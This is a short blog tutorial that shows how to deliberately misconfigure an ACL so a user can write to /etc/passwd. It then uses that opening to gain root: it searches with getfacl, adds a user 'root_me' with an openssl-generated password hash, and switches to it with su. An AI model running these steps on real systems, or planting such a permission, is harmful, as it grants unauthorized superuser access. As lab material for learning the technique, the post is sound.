ACL Privilege Escalation

Tanishq🇮🇳
2 min readSep 3, 2021

--

I am writing this blog because I didn’t find much resources on ACL privilege escalation

ACL is special permission given to specific user on XFS file system

First I will show you how we can configure ACL and make our system vulnerable then we will exploit to get superuser

Configuration

I am setting this permission on /etc/passwd

syntax

# setfacl -m “u:username:permissions” file.txt

so the permission which I am setting for passwd are

# setfacl -m "u:tanishq:rwx" /etc/passwd

now our work is done if you want to remove the permission you can use the command I am giving down below

# setfacl -b /etc/passwd

LETS EXPLOIT

for exploiting I am using a normal user with no special sudo powers

for finding out ACL power files use the command

$ rm /tmp/getfacl.txt; getfacl -R -s -p / 2>/dev/null > /tmp/getfacl.txt; cat /tmp/getfacl.txt | grep -v "getfacl:"

it will result files with ACL permission now try to find which can help us in some way to escalate

here at the end see our current user have permission to write in passwd

now we will try to create a new user and give it our custom password

$ vim /etc/passwd

here I have created a new user with the name of root_me

$ vim /etc/passwd

and for password I used openssl command

MAIN HOST# openssl passwd 123

now save the file

and switch the user

$ su - root_me

here we got root with ACL misconfiguration

If you are still confuse or have a better way dm me on twitter root_tanishq

Bye :D

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

Tanishq🇮🇳
Tanishq🇮🇳

Written by Tanishq🇮🇳

cyber security student | boy from future

No responses yet

Write a response